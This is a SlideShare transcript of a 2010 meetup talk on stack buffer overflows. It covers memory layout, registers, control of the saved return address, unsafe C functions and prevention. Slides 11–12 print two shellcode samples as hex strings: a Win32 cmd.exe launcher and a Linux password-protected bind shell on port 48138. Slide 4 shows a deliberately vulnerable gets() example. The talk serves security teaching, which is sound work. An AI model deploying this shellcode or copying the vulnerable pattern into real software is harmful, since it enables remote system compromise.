Buffer Overflow Demo by Saurabh Sharma

3,240 views

Published on

Buffer Overflow Demo by Saurabh Sharma @ null Banglore Meet, June, 2010

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,240
On SlideShare
0
From Embeds
0
Number of Embeds
49
Actions
Shares
0
Downloads
97
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Buffer Overflow Demo by Saurabh Sharma

  1. 1. Buffer Overflows <br />by: Saurabh Sharma<br />
  2. 2. BUFFER<br />
  3. 3. Buffer: The memory area where the user input is stored.<br />Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.<br />Anatomy of Buffer Overflows<br />
  4. 4. void get_input() {<br /> char buf[1024];<br /> gets(buf);<br />}<br />void main(intargc, char*argv[]){<br />get_input();<br />}<br />User controls the input. Malicious user can supply the input of more than 500 chars. So what ??<br />User can supply a malicious input which can execute some other exe. This can also be your cmd.exe and may lead to the system compromise.<br />A small example<br />
  5. 5. Text: Contains instructions<br />Data: Contains initialized variables<br />BSS: Contains uninitialized global and static variables(initialized to 0)<br />Heap: Contains dynamic, uninitialized data(malloc())<br />Stack: Contains function arguments and local variables<br />Memory overview<br />
  6. 6. Stack Frame:holds variables and data for function<br />Stack grows from higher memory location to lower memory location<br />Heap: lower to higher<br />Memory overview<br />
  7. 7. General purpose: For basic calculations.<br />ESI, EDI: Used mostly with arrays<br />Flags: Outcome of several instructions set the flags<br />Segment: Code, stack, data.<br />EBP:Base pointer, points to the beginning of the current stack frame<br />ESP: Stack pointer, points to the top of the stack<br />EIP: Instruction pointer, points to the next instruction<br />REGISTERS<br />
  8. 8. Stack is a LIFO data structure. Temporary memory, formed when the function called.<br />A new stack frame created when the function is called.<br />The return address is saved just above the local variables.<br />Stack Layout<br />Lower address<br />parameters<br />Return addr(saved EIP)<br />Saved EBP<br />Stack grows<br />Local variables<br />Higher address<br />
  9. 9. So, if the EIP can be controlled, the next instruction to be executed can be controlled.<br />Stack Layout<br />Lower address<br />parameters<br />Return addr(saved EIP)<br />Saved EBP<br />Stack grows<br />Local variables<br />Higher address<br />
  10. 10. Machine code which is injected into the overflown buffer<br />Does the work for you<br />WORK: executing a third program, adding an administrator etc.<br />SHELLCODE<br />
  11. 11. win32/xp sp2 (En) cmd.exe 23 bytes <br />Author : MountassifMoad A.K.A : <br />"x8bxecx68x65x78x65" "x20x68x63x6dx64x2e" "x8dx45xf8x50xb8x8D" "x15x86x7Cxffxd0"; <br />EXAMPLE SHELLCODES(SMALL)<br />
  12. 12. BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]=<br />"x31xdbx53x43x53x6ax02x89xe1xb0x66xcdx80" "x31xd2x52x66x68xbcx0ax66x6ax02x89xe2x6a" "x10x52x6ax03x89xe1xfexc3xb0x66xcdx80x6a" "x02x6ax03x89xe1xb3x04xb0x66xcdx80x31xc9" "x51x51x6ax03x89xe1xfexc3xb0x66xcdx80x31" "xdbx53x6ax3ax68x50x61x73x73x89xe6x6ax05" "x56x6ax04x89xe1xb3x09xb0x66xcdx80x31xc9" "x31xf6x51x6ax05x52x6ax04x89xe1xb3x0axb0" "x66xcdx80x31xc9x51x6ax72x68x68x61x78x6f" "x89xe7x89xd6x80xc1x05xfcxf3xa6x75xbfx31" "xc9xb3x04xb0x3fxcdx80x41x83xf9x03x75xf6" "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6e" "x89xe3x50x53x89xe1x31xd2xb0x0bxcdx80xb0" "x01xcdx80"<br />EXAMPLE SHELLCODES(bigger)<br />
  13. 13. DEMO<br />
  14. 14. strcpy() <br />strcat() <br />sprintf() <br />scanf() <br />sscanf() <br />fscanf() <br />vfscanf() <br />vsprintf<br />vscanf() <br />vsscanf() <br />streadd() <br />strecpy() <br />strtrns() <br />MAJOR SNARES<br />
  15. 15. Buffer size must be checked<br />Use alternative functions e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src)<br />Other protection mechanisms like /GS(stack cookie), ASLR, SafeSEH compilation<br />PREVENTION<br />
  16. 16. http://www.cccure.org/amazon/idssignature.pdf<br />http://www.shell-storm.org/papers/files/539.pdf<br />http://c0re.23.nu/~chris/data/bo-2004.pdf<br />http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf<br />REFERENCES<br />
  17. 17. ?????????????????<br />QUESTIONS <br />

×